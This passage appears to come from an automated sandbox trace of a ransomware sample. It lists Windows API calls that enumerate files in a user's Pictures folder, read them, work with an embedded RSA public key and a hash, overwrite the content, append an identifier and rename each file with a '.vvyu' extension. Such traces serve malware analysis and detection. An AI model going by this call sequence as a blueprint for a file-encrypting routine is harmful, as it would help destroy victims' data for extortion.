hHeap=0x2c0000) returned 1 [0190.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.213] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x15bad, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x15bad, lpOverlapped=0x0) returned 1 [0190.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.214] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15bb2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.214] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.215] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.216] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.216] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.216] CloseHandle (hObject=0x584) returned 1 [0190.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.218] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\5KliNx-drvR8.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\5klinx-drvr8.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\5KliNx-drvR8.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\5klinx-drvr8.bmp.vvyu")) returned 1 [0190.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.219] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.222] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x775dcca0, ftCreationTime.dwHighDateTime=0x1d8a0cf, ftLastAccessTime.dwLowDateTime=0x5a62d770, ftLastAccessTime.dwHighDateTime=0x1d8a2bf, ftLastWriteTime.dwLowDateTime=0x5a62d770, ftLastWriteTime.dwHighDateTime=0x1d8a2bf, nFileSizeHigh=0x0, nFileSizeLow=0x12fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5_Xd oyQT5yLzW2rnd.bmp", cAlternateFileName="5_XDOY~1.BMP")) returned 1 [0190.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3030 [0190.222] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0190.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3030 | out: hHeap=0x2c0000) returned 1 [0190.222] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\5_Xd oyQT5yLzW2rnd.bmp") returned=".bmp" [0190.222] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\5_Xd oyQT5yLzW2rnd.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\5_xd oyqt5ylzw2rnd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.223] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=4860) returned 1 [0190.223] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.225] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.226] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.228] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.228] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x12fc, lpOverlapped=0x0) returned 1 [0190.228] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.228] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.229] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.229] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.230] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.230] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.230] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.230] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.230] GetLastError () returned 0x0 [0190.230] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.230] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.230] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.230] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.230] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.231] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1300) returned 0x2ae5ea0 [0190.231] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3030 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dbf8 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3078 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc10 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc58 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.232] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc58 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dc40 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc58 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.235] GetCurrentThreadId () returned 0x5d8 [0190.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4b18 [0190.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.236] GetCurrentThreadId () returned 0x5d8 [0190.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc40 [0190.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc58 [0190.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc28 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc70 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dc40 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc40 | out: hHeap=0x2c0000) returned 1 [0190.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 